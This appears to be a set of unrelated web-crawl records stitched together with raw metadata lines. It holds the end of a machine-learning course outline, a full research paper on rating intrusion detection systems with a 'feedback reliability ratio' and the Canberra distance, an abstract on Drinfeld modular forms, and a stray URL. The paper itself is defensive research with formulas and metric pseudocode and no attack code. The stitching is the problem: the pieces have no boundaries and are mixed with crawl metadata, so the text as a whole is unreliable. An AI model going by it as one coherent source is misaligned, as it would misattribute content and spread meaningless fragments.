Convex/Non-convex functions\n4. Fermat’s Theorem\n5. Lagrange function\n6. KKT conditions\n7. Multivariable Search techniques\n\ni.     Derivative-free: Dichotomous,  Fibonacci, Golden selection\n\nii.     Derivative based: Steepest Descent, Gradient descent, Newton’s method\n\niii.     Random Search: Genetic Algorithm\n\nA.4         Python Programming basics\n\nModule B: Learning Concepts (10 Hours)\n\n1. Supervised and Unsupervised Learning\n3. Model Selection\n4. Cross Validation\n5. VC Dimension\n6. Regularization theory\n\nModule C: Statistical Learning Models (20 Hours)\n\n1. Multivariate Linear regression\n2. Principle and Factor Analysis\n3. Discrimination and Classification\n4. Multivariate normal\n5. Fishers linear discriminant\n6. Clustering\n7. Expectation Maximization\n8. K-means, Hierarchal and DBSCAN\n9. Generalized Linear Models (Exponential Family)\n10. Logistic and Multinomial regression\n11. Poisson regression and log-linear models\n12. Survival models\n\nModule D: Machine Learning Models (30 Hours)\n\n1. Artificial Neural Network\n2. Deep Learning\n3. Support Vector Machines and Kernel Regression\n4. Hidden Markov Models\n5. Decision Trees\n6. Ensemble Methods\n7. Random Forest" ]
[ null, "https://static.meraevents.com/content/eventbanner/134324/header14975496157Uo97.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8369587,"math_prob":0.74019367,"size":1619,"snap":"2023-14-2023-23","text_gpt3_token_len":323,"char_repetition_ratio":0.105882354,"word_repetition_ratio":0.017316017,"special_character_ratio":0.18344657,"punctuation_ratio":0.123188406,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9637115,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-07T12:33:57Z\",\"WARC-Record-ID\":\"<urn:uuid:78d0f324-1897-470e-b135-8bb915d1d3b2>\",\"Content-Length\":\"119212\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ccefb467-0416-474c-bbdb-d3debdc9fce9>\",\"WARC-Concurrent-To\":\"<urn:uuid:65ba0337-d13d-4a98-b947-b62a0b8c4506>\",\"WARC-IP-Address\":\"104.21.69.160\",\"WARC-Target-URI\":\"https://www.meraevents.com/event/applied-machine-learning-and-data-analytics\",\"WARC-Payload-Digest\":\"sha1:5Q2NL73KJAEXCIBOSRNBY3Q5TKG4PL4F\",\"WARC-Block-Digest\":\"sha1:2HFBES7HCRURHCCPGIIGHZLKYAPYVSDO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224653764.55_warc_CC-MAIN-20230607111017-20230607141017-00072.warc.gz\"}"}
https://file.scirp.org/Html/9-7800100_21347.htm
[ "Feedback Reliability Ratio of an Intrusion Detection System\n\nJournal of Information Security\nVol. 3  No. 3 (2012) , Article ID: 21347 , 7 pages DOI:10.4236/jis.2012.33030\n\nFeedback Reliability Ratio of an Intrusion Detection System\n\nUsha Banerjee1*, Gaurav Batra1, K. V. Arya2\n\n1Department of Computer Science and Engineering, College of Engineering Roorkee (COER), Roorkee, India\n\n2Department of ICT, Atal Bihari Vajpayee Indian Institute of Information Technology and Management, Gwalior, India\n\nEmail: *[email protected], [email protected]\n\nReceived May 18, 2012; revised June 14, 2012; accepted June 21, 2012\n\nKeywords: Attacks; Canberra Metric; Feedback; Intrusion Detection; Performance; Reliability\n\nABSTRACT\n\nThe behavior and nature of attacks and threats to computer network systems have been evolving rapidly with the advances in computer security technology. At the same time however, computer criminals and other malicious elements find ways and methods to thwart such protective measures and find techniques of penetrating such secure systems. Therefore adaptability, or the ability to learn and react to a consistently changing threat environment, is a key requirement for modern intrusion detection systems. In this paper we try to develop a novel metric to assess the performance of such intrusion detection systems under the influence of attacks. We propose a new metric called feedback reliability ratio for an intrusion detection system. We further try to modify and use the already available statistical Canberra distance metric and apply it to intrusion detection to quantify the dissimilarity between malicious elements and normal nodes in a network.\n\n1. Introduction\n\nNowadays the risk of attacks in data networks is exponentially rising. Thus, the area of network security is gaining importance for researchers and practioners. Attack could be either from outside or from the inside of a network. Further compared to wired networks, mobile ad-hoc networks have several disadvantages with respect to security the most important being the dynamic nature of such networks. In such networks node act as routers and participate in the routing process following some routing protocol. Till date several routing protocols have been formulated for such networks. However, attackers have been always successful to penetrate and harm such networks. Attacks have been classified by several researchers based on the behavior of attacks. Attacks might be internal or external . External attackers try to hamper network performance using any one of the technique like eavesdropping, message intercepting, replay etc. However, the problem is more severe in case of an internal attacker and thus in such a situation the task to detect the misbehaving node becomes daunting. A single intruder can manage to create havoc in a network. This is referred as an intrusion in the system, where a node or malicious element from within a network tries to hamper the normal functioning of the network. To resolve this cumbersome task various Intrusion Detection Systems (IDS) have been developed, which uses different techniques to identify threats in a network. All the available algorithms are based on some assumptions and consider some measure which determine the misbehaving nature of a node. Different approaches are used to determine an intruder in a system, with every approach having its own merits and demerits . 
One of the approaches used in intrusion detection systems maintains pre-defined knowledge of intrusions. Every time an abnormal activity is encountered, this predefined list of intrusions is checked for a match. But this type of technique can detect only a specified number of intrusions. While this list of intrusions can be updated from time to time, this static approach, known as signature-based intrusion detection, is not considered an efficient approach for real-time network systems. Another approach used for detecting the misbehavior of an insider node considers a measure in which a threshold value is set on the basis of normal activities. Then the value of the measure is determined for the node considering all of its parameters. If this calculated value deviates from the threshold value, then the node is declared an intrusion in the system. This kind of approach, known as anomaly-based detection, helps in detecting new threats introduced in the network. Similarly, various other intrusion detection systems are available, but there is no particular measure available which can successfully rank the presently available IDS on the basis of their capability and performance.

In this paper, a novel approach has been proposed which can predict the performance level of an Intrusion Detection System on the basis of its activities recorded over a particular interval. For this purpose, real-time data packet information is captured on a network of both types: pure network data, and data containing various attacks. A statistical approach known as the Canberra metric is adopted in this proposal. The Canberra metric is used to determine the dissimilarity between different groups of elements based on various parameters.

Prior Work

Various attempts have been made in the past to define a reasonable measure of the level of trust for an IDS, such that the reliability of an IDS can be calculated and a confidence level can be defined for a particular network. The biggest problem that is yet to be resolved is to decide the key factors to be taken into account for describing and analyzing the performance of an IDS. Various options like false positives, false negatives, number of packets observed, number of detections, cost of maintenance, confidence value, etc. have been proposed by researchers. Numerous techniques and methodologies have been adopted by researchers to illustrate and benchmark an IDS.

In one survey, the available IDS technologies were analyzed and the authors proposed an evaluation scheme which considered false positive rate, false negative rate, vulnerability, etc. as the key dimensions of an intrusion detection system, and showed that these parameters are to be taken into account to analyze and improve the quality of network IDS. Another work proposed a new metric called Intrusion Detection Capability, which considered the ratio of the mutual information between the IDS input and output to the entropy of the input, and proved it to be a better measuring tool to determine the capability of an IDS. The authors also showed an analysis comparing previously available cost-based approaches and the proposed metric in a sample scenario.

Other authors summarize and present a few test cases to demonstrate various evaluation environment methodologies. A new technique has also been proposed in an open source environment which is based on both Artificial Intelligence and real network traffic data. 
The approach included injecting artificial attacks into the isolated test environment to realize the capability of a system. A similar approach has been adopted in which a TCL script is executed in a preset TELNET environment and can reveal important information about an IDS and its capabilities.

Benchmarking an IDS is not a fully evaluative task and cannot be accomplished by applying a single logical technique. Hence, no perfect evaluation methodology has been developed so far to analyze an IDS before it is installed on a system. Approaches adopted so far lack depth in one aspect or another and need some modification in light of the challenges present in real environments in the present scenario. Some of those challenges faced in real-time networks are: 1) ever increasing network traffic; 2) the use of encrypted messages to transport malicious information; 3) the use of more complex, subtle, and new attack scenarios; and many more.

Earlier work presented a brief description comparing different available approaches to evaluate the performance of an Intrusion Detection System. That article concluded on the note that there is a lot of scope for further research in this field, as the most suitable approach is yet to be discovered. In this paper, a statistical approach has been proposed to untie the knot of the problem explained above. This paper aims at presenting a metric-based solution for the evaluation and analysis of the performance and reliability of an IDS, and at providing the network intrusion detection system analyst with a tool which can be used to judge an IDS before installing it on a system. Predictions can then be made for an IDS regarding its reliability, the trust level of its detections, and the security of data. It has previously been shown that Canberra and Chi-Square are metrics which could be used in intrusion detection.

The rest of the paper is organized as follows. Section 2 discusses various statistical techniques available to evaluate similarities and dissimilarities and goes on to discuss how these statistical techniques could be applied to the field of intrusion detection. Section 3 presents the approach that we have followed. In Section 4 we present the mathematical and programmatic implementation of the problem. Section 5 deals with results and discussions.

2. Statistical Techniques

Statistics deals with huge volumes of data and has several established techniques to analyze the data based on their similarity or dissimilarity. In huge volumes of data a small anomaly can easily be identified from historical data. This phenomenon can be adapted to network intrusion detection. Since warnings are based on actual usage patterns, statistical systems can adapt to behaviors and therefore create their own rule usage-patterns. The usage-patterns are what dictate how anomalous a packet may be to the network.

Anomalous activity is measured by a number of variables sampled over time and stored in a profile. Based on the anomaly score of a packet, the reporting process will deem it an alert if it is sufficiently anomalous; otherwise, the IDS will simply ignore the trace. The IDS will report the intrusion if the anomalous activity exceeds a threshold value.

Statistical techniques of intrusion detection usually measure similarities or dissimilarities between network variables like users logged in, time of login, time of logout, number of files accessed in a period of time, usage of disk space, memory, CPU, IP addresses, number of packets transferred, etc. 
The frequency of updating can vary from a few minutes to, for example, one month. The system stores mean values for each variable and flags a detection when an observed value exceeds a predefined threshold.

Similarity is defined as a quantity that reflects the strength of the relationship between two objects or two features. This quantity usually has a range of either –1 to +1 or is normalized into 0 to 1. If the similarity between object i and object j is denoted by s_ij, we can measure this quantity in several ways depending on the scale of measurement (or data type) that we have. On the other hand, dissimilarity measures the discrepancy between the two objects based on several features. Dissimilarity may also be viewed as a measure of disorder between two objects. These features can be represented as coordinates of the object in the feature space. There are many types of distance and similarity. Each similarity or dissimilarity has its own characteristics. Let the dissimilarity between object i and object j be denoted by $\delta_{ij}$. The relationship between dissimilarity and similarity is given by

$\delta_{ij} = 1 - s_{ij}$ (1)

for similarity bounded by 0 and 1. When the objects are similar, the similarity is 1 and the dissimilarity is 0, and vice versa. If similarity has a range of –1 to +1 and the dissimilarity is measured with a range of 0 and 1, then

$\delta_{ij} = \frac{1 - s_{ij}}{2}$ (2)

There are several distance metrics available for measuring the similarity or dissimilarity between quantitative variables. The simplest distance measure is the Euclidean distance. Euclidean distance, or simply “distance”, examines the root of square differences between the coordinates of a pair of objects and is given by

$d_{ij} = \sqrt{\sum_{k}(x_{ik} - x_{jk})^{2}}$ (3)

The Manhattan distance metric is another such metric. It represents distance between points in a city road grid. It examines the absolute differences between the coordinates of a pair of objects and is given by

$d_{ij} = \sum_{k}|x_{ik} - x_{jk}|$ (4)

Chebyshev distance is another such statistical distance metric and is also called the maximum value distance. It examines the absolute magnitude of the differences between the coordinates of a pair of objects and is given by

$d_{ij} = \max_{k}|x_{ik} - x_{jk}|$ (5)

The Chebyshev metric is actually a special case of the Minkowski metric with λ = ∞ and has been used to calculate the dissimilarities between normal events and malicious events in networks. In this paper we use the Canberra metric. The Canberra distance was proposed by Lance and Williams in 1967. It examines the sum of a series of fractional differences between the coordinates of a pair of objects. Each fractional term has a value between 0 and 1. The Canberra distance itself is not between zero and one. If one of the coordinates is zero, the term becomes unity regardless of the other value, thus the distance will not be affected. Note that if both coordinates are zero, the term needs to be defined as 0/0 = 0. This distance is very sensitive to a small change when both coordinates are near to zero. The Canberra distance is given by

$d_{ij} = \sum_{k}\frac{|x_{ik} - x_{jk}|}{|x_{ik}| + |x_{jk}|}$ (6)

3. Our Approach

We start with the selection of the key factors which can best describe a system in terms of capability and vulnerability.

Using these key factors, a formula-based approach is used to calculate a reliability value, which shows the level to which a user can rely on the IDS. A threshold value is defined in accordance with the normal functioning of an intrusion detection system in a real-time environment. A distance measuring metric known as the Canberra metric is applied to determine the similarity or dissimilarity between the predefined threshold value and the observation value. 
Comparison results are provided by the Canberra metric, which depict the trust level of the IDS. If the observed value is less than the defined threshold value, it shows that the IDS under consideration is not a reliable one.

Now these similarity-based values generated by the Canberra metric are passed to an evaluation tool which generates a receiver operating characteristics (ROC) graph showing the comparison between the observed value and the predefined value.

3.1. Feedback Reliability Ratio (FRR)

The primary task of our approach is the selection of the attributes on which the evaluation of an IDS is to be based.

For this purpose four parameters are taken into consideration, namely: True Positive (TP), False Positive (FP), True Negative (TN), and False Negative (FN). True Positive depicts the number of detections raised by the IDS when the detected activities are actually a threat to the system. False Positive denotes an incorrect decision made by the IDS about a supposed threat, when the activity was not actually involved in any threatening event. True Negative is the condition when the IDS correctly determines that an activity is harmless. False Negative is the situation when the IDS declares an activity as harmless, while the activity was a threat and was capable of causing harm to the system.

The fundamental property of a good Intrusion Detection System is not only to detect a threat but also to provide a correct and reliable decision about an activity. The performance of a system degrades if the IDS installed on the system provides improper feedback about an activity. So, the reliability factor converges to the False Positive (FP) and False Negative (FN) values of the IDS, and these two attributes can describe the capability of an IDS to a reasonable extent. Lower FP and FN values indicate better reliability of the feedback provided by the IDS. Mathematically, the reliability of the feedback provided by an IDS is expressed in Equation (7).

The total of both factors (FP and FN) represents the number of incorrect decisions declared by the IDS. So, a feedback ratio can be determined on the basis of these two factors, which describes the reliability value of the IDS on the basis of its past judgments; this gives Equation (8), where α = coefficient of false positives and β = coefficient of false negatives.

Depending upon the environment in which the IDS is installed, expectations from an IDS vary in terms of performance. In some situations a very low value of FN is desired, as a high value of FN can harm a system if a strong attack passes through the IDS filter. However, in some cases a high value of FP can drastically degrade the system performance, as the user will not be able to execute any task if the IDS blocks most activities by marking them as threats. Hence, the coefficients (α and β) used in the above equations can take values between 0 and 1 depending upon the expectations of the environment in which the IDS is to be applied. Figure 1 shows a flowchart of our approach.

Figure 1. Flowchart.

3.2. Canberra Metric to Predict the Performance of an IDS

The Canberra metric is a measure used for determining the distance between groups in terms of the similarity between their elements. The Canberra metric operates on a rectangular matrix of numerical values, with different cases as its rows and the variations observed in a case as its column values. A square symmetric matrix is generated as the output of the metric algorithm, with zeros as its diagonal elements. 
The values of the output matrix represent the distance between the variations of the cases. The distance between any two cases is determined using the formula shown below:

$d_{ij} = \sum_{k}\frac{|y_{ik} - y_{jk}|}{y_{ik} + y_{jk}}$ (9)

where i and j are the cases for which the distance is to be determined, and k is the variation index for the cases. For the evaluation of an Intrusion Detection System using the Canberra distance metric, various test cases are taken under consideration which provide us with the numerical values to be passed as the input to the Canberra metric. To generate different test cases for the evaluation of computer network intrusion detection systems, the dataset made available by MIT Lincoln Laboratory, under Defense Advanced Research Projects Agency (DARPA ITO) and Air Force Research Laboratory (AFRL/SNHS) sponsorship, for the 1998 and 1999 evaluations is used. These data sets contain examples of both attacks and background traffic. The Canberra metric determines the distance between the FRR values using the above equation and finally outputs the distance values in a square symmetric matrix form. These output values show the distance, or in our case the dissimilarity, for different test cases. The Canberra metric provides a mathematical representation of the similarity/dissimilarity between the various cases available; the values of different columns can be compared to see the different trust levels of the IDS. This observation helps an analyst to decide upon the IDS to be used on a system for securing data and protecting it from any external threat.

3.3. Weka

To demonstrate the results obtained by the Canberra metric graphically, any graphical tool can be used. In our case a well-known tool named Weka is used. Waikato Environment for Knowledge Analysis (Weka) is an evaluation tool used for data mining, data analysis and predictive modeling purposes. The present version of Weka is built on the Java programming language, so it provides better flexibility and can be deployed on any platform. The values generated by the Canberra metric are passed as an input to Weka through a file in comma separated values (CSV) format. Weka uses these values in the CSV file to output a Receiver Operating Characteristics (ROC) graph which shows the deviation between different curves; the greater the observed deviation, the lower the capability of the IDS.

4. Implementation of Canberra Metric

A slightly modified form of the Canberra metric is implemented for the evaluation of the distance measure. Pseudocode for the modified Canberra metric algorithm is given below. Consider \"C\" to be the number of test cases generated and \"v\" the number of variations observed in a test case, and \"X\" a temporary variable. Let \"M\" (of order C*v) be the input matrix containing all the data required to be processed by the algorithm, and \"O\" (of order C*C) the output matrix, which is a square symmetric matrix.

CANBERRA-DETERMINE (C, v)

1) For i = 0 to C - 1

2) Begin

3) For j = 0 to C - 1

4) Begin

5) Val = 0

6) For k = 0 to v - 1

7) Begin

8) Yik = M[i][k];

9) Yjk = M[j][k];

10) Val = Val + Abs(Yik - Yjk)/(Yik + Yjk) //Accumulate the standard Canberra term for variation k

11) End

12) O[i][j] = Val; //Save this distance in the output matrix

13) End

14) End

15) Output 'Matrix O'

This output matrix \"O\" provides us with the values depicting the deviation between the performances of the IDS in different cases, which helps us in determining the overall capability of the IDS. 
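Equations (7) and (8) are present in the source only as images, so the exact FRR formula is not reproduced above. The short Python sketch below is therefore only an illustration, not the authors' implementation: the FRR value it computes uses an assumed form, (α·FP + β·FN)/Total, which is one plausible reading of Section 3.1, while the distance-matrix part follows the CANBERRA-DETERMINE pseudocode (cases as rows, variations as columns, zero diagonal). All input numbers are hypothetical.

```python
from typing import List, Tuple

def feedback_reliability_ratio(fp: int, fn: int, total: int,
                               alpha: float = 0.5, beta: float = 0.5) -> float:
    """Assumed FRR form: weighted share of incorrect decisions (not the paper's exact equation)."""
    return (alpha * fp + beta * fn) / total

def canberra_matrix(m: List[List[float]]) -> List[List[float]]:
    """Square symmetric Canberra distance matrix over the rows of m (cases x variations)."""
    c = len(m)
    out = [[0.0] * c for _ in range(c)]
    for i in range(c):
        for j in range(c):
            val = 0.0
            for yik, yjk in zip(m[i], m[j]):
                if yik == 0 and yjk == 0:
                    continue  # define 0/0 as 0, as in Section 2
                val += abs(yik - yjk) / (abs(yik) + abs(yjk))
            out[i][j] = val
    return out

# Hypothetical input: for each test case, (FP, FN, total activities) observed in three intervals.
cases: List[List[Tuple[int, int, int]]] = [
    [(4, 2, 100), (5, 3, 100), (2, 1, 100)],
    [(10, 6, 100), (12, 7, 100), (9, 5, 100)],
    [(1, 1, 100), (0, 2, 100), (1, 0, 100)],
]
# Matrix M: one row per case, one column (variation) per interval, holding the FRR value.
m = [[feedback_reliability_ratio(fp, fn, n) for fp, fn, n in case] for case in cases]
for row in canberra_matrix(m):
    print(["%.3f" % v for v in row])
```

The resulting matrix is symmetric with a zero diagonal, matching the structure described above; its per-case sums could then be written to a CSV file for plotting, as discussed in Section 3.3.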
The values passed to the Canberra algorithm are obtained by applying the Feedback Reliability Ratio (FRR) formula on various test cases (taking a moderate value of 0.5 for both the coefficients α and β). After applying the Canberra algorithm on these values of the test cases, a square matrix is obtained that clearly depicts the effective value for every case. Figure 2 shows the structure of the matrices, the input values and the output matrix generated.

Figure 2. Structure of matrices.

Finally, a graphical representation of the observed values is generated. The sum of the effective values for every case from the output matrix is used to locate points in the graph on the y-axis, along with the intervals given on the x-axis. Joining these points in the graph generates a polyline graph, which shows the capability of an Intrusion Detection System for various test cases.

5. Results and Discussion

Figure 3. ROC curve.

The peak point of the ROC graph shown in Figure 3 shows the poor performance of the IDS in a real-time environment, while a point at a lower level shows better feedback results provided by the IDS. Thus, from the ROC graph for an IDS it can easily be predicted in what scenario an IDS can perform efficiently. The ROC can also predict in what situation the IDS does not provide reliable detections, and the trust level of the IDS.

The approach followed in this paper makes use of easily available attributes like False Positive (FP), False Negative (FN) and the total number of activities, which help in determining the Feedback Reliability Ratio (FRR). Further, a distance-based metric is used to determine the similarity or dissimilarity in the behavior of an IDS. In our case, the Canberra metric is implemented for this purpose on the data set provided by the DARPA analysis in 1999 for the evaluation of Intrusion Detection Systems. Finally the results produced by the Canberra metric are shown graphically using a Java-based data mining tool by drawing an ROC graph.

The approach shown in this paper proves its importance in the field of network security, as data security is a crucial factor in networks where many sites interact with each other for data sharing and transaction of information. In such areas, a single threat can hamper the whole system due to its malicious nature, and hence the need arises for a reliable Intrusion Detection System which can secure both data and transactions on a system. But for this purpose, there should be a proper evaluation methodology which can predict the nature and performance of an IDS before installing it in a real-time scenario. Our approach accomplishes that purpose by defining an evaluation technique for IDS using information about its behavior in the past.

6. Future Work

Unlike the norm that an IDS should be executed as often as possible to minimize the effects of intrusions, we have shown that the IDS should be operated at optimum times with a view to maximizing the reliability of the IDS. The optimal position at which reliability is a maximum depends on several factors like attacker types, network characteristics, etc. Thus, our aim should be to optimize performance and hence reliability of the IDS in such varying circumstances. In future we hope to devise methods to increase performance and predict more accurate reliability of intrusion detection systems.

7. Acknowledgements

The first author wishes to acknowledge the support of a WOS-A project (ref. no.
: SR/WOS-A/ET-20/2008) funded by the Department of Science and Technology, Government of India.\n\nREFERENCES\n\n1. M. Mahoney, “Computer Security: A Survey of Attacks and Defenses,” 2000. http://docshow.net/ids.htm\n2. U. Banerjee and A. Swaminathan, “A Taxonomy of Attacks and Attackers in MANETs,” International Journal of Research and Reviews in Computer Science, Academy Publishers, Vol. 2, 2011, pp. 437-441.\n3. P. Ning and K. Sun, “How to Misuse AODV: A Case Study of Insider Attacks against Mobile Ad-Hoc Routing Protocols,” Journal Ad Hoc Networks, Vol. 3, No. 6, 2005, pp. 60-67.\n4. S. E. H. Smaha, “An Intrusion Detection System,” Proceedings of the IEEE Fourth Aerospace Computer Security Applications Conference, Orlando, December 1988, pp. 37-44.\n5. H. Debar, M. Dacier and A. Wespi, “Towards a Taxonomy of Intrusion Detection Systems,” Computer Networks, Vol. 31, No. 8, 1999, pp. 805-822. doi:10.1016/S1389-1286(98)00017-6\n6. J. Allen, A. Christie, W. Fithen, et al., “State of the Practice of Intrusion Detection Technologies,” Carnegie Mellon University, Software Engineering Institute, CMU/ SEI-99-TR-028 ESC-TR-99-028, 2000. http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.155.4719\n7. G. F. Gu, P. Fogla, D. Dagon, W. Lee and B. Skori, “Measuring Intrusion Detection Capability: An Information-Theoretic Approach,” Proceedings of the 2006 ACM Symposium on Information, Computer and Communications Security, New York, 2006, pp. 90-101.\n8. A. Nicholas, A. Randal, L. John, O. Henry and R. George, “Intrusion Detection Testing and Benchmarking Methodologies,” Proceedings of the First IEEE International Workshop on Information Assurance, Washington DC, 2003.\n9. N. J. Puketza, K. Zhang, M. Chung, B. Mukherjee and R. A. Olsson, “A Methodology for Testing Intrusion Detection Systems,” IEEE Transactions on Software Engineering, Vol. 22, No. 10, 1996, pp. 719-729.\n10. M. Ranum, “Experiences Benchmarking Intrusion Detection Systems,” 2001. http://www.nfr.com/\n11. Anonym, “Testing Intrusion Detection Systems: A Critique of the 1998 and 1999 DARPA Intrusion Detection System Evaluations as Performed by Lincoln Laboratory,” ACM Transactions on Information and System Security, Vol. 3, No. 4, 2000, pp. 262-294.\n12. Wilkison, “Intrusion Detection FAQ: How to Evaluate Network Intrusion Detection Systems?” http://www.sans.org/security-resources/idfaq/eval ids.php\n13. S. M. Emran, and N. Ye, “Robustness of Chi-Square and Canberra Distance Metrics for Computer Intrusion Detection,” Quality and Reliability Engineering International, Vol. 18, No. 1, 2002, pp. 18-28.\n14. R. A. Johnson and D. W. Wichern, “Applied Multivariate Statistical Analysis,” Prentice Hall, New Jersey, 1998, pp. 226-235.\n15. T. P. Ryan, “Statistical Methods for Quality Improvement,” John Wiley & Sons, New York, 1989.\n16. R. Lippmann, D. J. Fried, I. Graf, J. W. Haines, K. R. Kendall, D. McClung, D. Weber, S. H. Webster, D. Wyschograd, R. K. Cunningham and M. A. Zissman, “Evaluating Intrusion Detection Systems: The 1998 DARPA Off-Line Intrusion Detection Evaluation,” IEEE Computer Society Press, Vol. 2, 2000, pp. 12-26.\n17. R. Lippmann, J. W. Haines, D. J. Fried, J. Korba and K. Das, “The 1999 DARPA Off-Line Intrusion Detection Evaluation,” Springer, Berlin Heidelberg, New York, 2000, pp. 162-182.\n18. Weka. http://www.cs.waikato.ac.nz/ml/weka/\n19. Z. Markov and I. 
Russell, “An Introduction to the WEKA Data Mining System,” Proceedings of the 11th Annual SIGCSE Conference on Innovation and Technology in Computer Science Education, 2006, pp. 367-368.\n\nNOTES\n\n*Corresponding author." ]
[ null, "https://file.scirp.org/Html/9-7800100\\0f16b975-d3dd-4cce-8627-a96f49b84e82.jpg", null, "https://file.scirp.org/Html/9-7800100\\7d051f27-a4a8-43e8-a448-287257f3ef75.jpg", null, "https://file.scirp.org/Html/9-7800100\\ca19da64-9729-40e8-b1bd-cfeaa68836f5.jpg", null, "https://file.scirp.org/Html/9-7800100\\9da34b7a-2707-49d3-b623-6076b8abf923.jpg", null, "https://file.scirp.org/Html/9-7800100\\ca8f95a7-1de2-4f6e-939c-b1b6444c815a.jpg", null, "https://file.scirp.org/Html/9-7800100\\db66713e-c611-4a85-a802-16513d3cba83.jpg", null, "https://file.scirp.org/Html/9-7800100\\baab6eb2-191d-44c0-85e7-90c1a64ac53c.jpg", null, "https://file.scirp.org/Html/9-7800100\\d5706754-9275-4a74-9c53-877620b909b6.jpg", null, "https://file.scirp.org/Html/9-7800100\\c59ac06e-4a38-4ec2-9b19-f90f7e34d956.jpg", null, "https://file.scirp.org/Html/9-7800100\\1fc4af2c-fee6-40ae-9423-0748420f876c.jpg", null, "https://file.scirp.org/Html/9-7800100\\fcaff144-e0b0-4b02-9f9b-3f12f6ce6b16.jpg", null, "https://file.scirp.org/Html/9-7800100\\6c68b471-dcde-483f-ad8a-693d331d4631.jpg", null, "https://file.scirp.org/Html/9-7800100\\4f1eff0e-fe6f-4093-b3e2-4bd36c7a5eb3.jpg", null, "https://file.scirp.org/Html/9-7800100\\1579b72f-3157-4cea-a68e-787f864b94f0.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9084497,"math_prob":0.89212227,"size":27548,"snap":"2020-34-2020-40","text_gpt3_token_len":5790,"char_repetition_ratio":0.14024833,"word_repetition_ratio":0.012443439,"special_character_ratio":0.20803688,"punctuation_ratio":0.11724273,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95342636,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28],"im_url_duplicate_count":[null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-13T06:24:46Z\",\"WARC-Record-ID\":\"<urn:uuid:a92ccc0d-f2ff-411f-b921-39ab65d54893>\",\"Content-Length\":\"50615\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4b1f4c97-756e-4c85-879d-ceb9b8eb123b>\",\"WARC-Concurrent-To\":\"<urn:uuid:6d74961b-dd72-488a-b0ba-a8ef2f8c2bd7>\",\"WARC-IP-Address\":\"209.141.51.63\",\"WARC-Target-URI\":\"https://file.scirp.org/Html/9-7800100_21347.htm\",\"WARC-Payload-Digest\":\"sha1:ZMGFFCYJDFKEIQDJQDUH5VXSHHMICIFU\",\"WARC-Block-Digest\":\"sha1:MMSFNTEKA3QLHAFLCO45WI7C462ST3YJ\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439738960.69_warc_CC-MAIN-20200813043927-20200813073927-00359.warc.gz\"}"}
https://math.sun.ac.za/2020/01/29/baker.html
[ "# Mathematics Wiskunde\n\nA space $$\\mathcal{L}^r_N$$ of Drinfeld modules of rank $$r \\geq 1$$ with level structure, or equivalently lattices of rank $$r$$ with level structure, is introduced, and its irreducible components and group actions on it are investigated. A metric is defined on this space, its completion $$\\overleftarrow{\\mathcal{L}^r_N}$$ is established and the aforementioned group actions are extended to the completion. A decomposition of the completion into multiple smaller spaces $$\\mathcal{L}^s_N$$ is proven. Drinfeld modular forms are defined as homogeneous holomorphic functions on $$\\mathcal{L}^r_N$$ which are continuous on the completion $$\\overleftarrow{\\mathcal{L}^r_N}$$, and the group actions above are extended to actions on the spaces of modular forms. Finally, the modular forms defined here are compared with those of Basson, Breuer, and Pink, and it is shown that the cusp forms (those which are zero on the boundary) coincide." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92659855,"math_prob":0.9991968,"size":936,"snap":"2020-45-2020-50","text_gpt3_token_len":226,"char_repetition_ratio":0.13304721,"word_repetition_ratio":0.0,"special_character_ratio":0.22435898,"punctuation_ratio":0.0875,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9964938,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-31T09:27:38Z\",\"WARC-Record-ID\":\"<urn:uuid:0d54a45b-c698-4697-90a6-df76f7f753e5>\",\"Content-Length\":\"6761\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:26f304d4-c462-4fa4-bd40-2e042e4843de>\",\"WARC-Concurrent-To\":\"<urn:uuid:5836e72d-5429-45d9-9cc7-aa70629be399>\",\"WARC-IP-Address\":\"146.232.66.100\",\"WARC-Target-URI\":\"https://math.sun.ac.za/2020/01/29/baker.html\",\"WARC-Payload-Digest\":\"sha1:POEHO7EO3UOUCVTES2GZZX4P2EHQXG3S\",\"WARC-Block-Digest\":\"sha1:Y6AYL7N27UGV6EFLX5VXNJLBY6DVUX6H\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107917390.91_warc_CC-MAIN-20201031092246-20201031122246-00489.warc.gz\"}"}
https://socratic.org/questions/how-do-you-rationalize-the-denominator-and-simplify-x-42-sqrtx-7-7
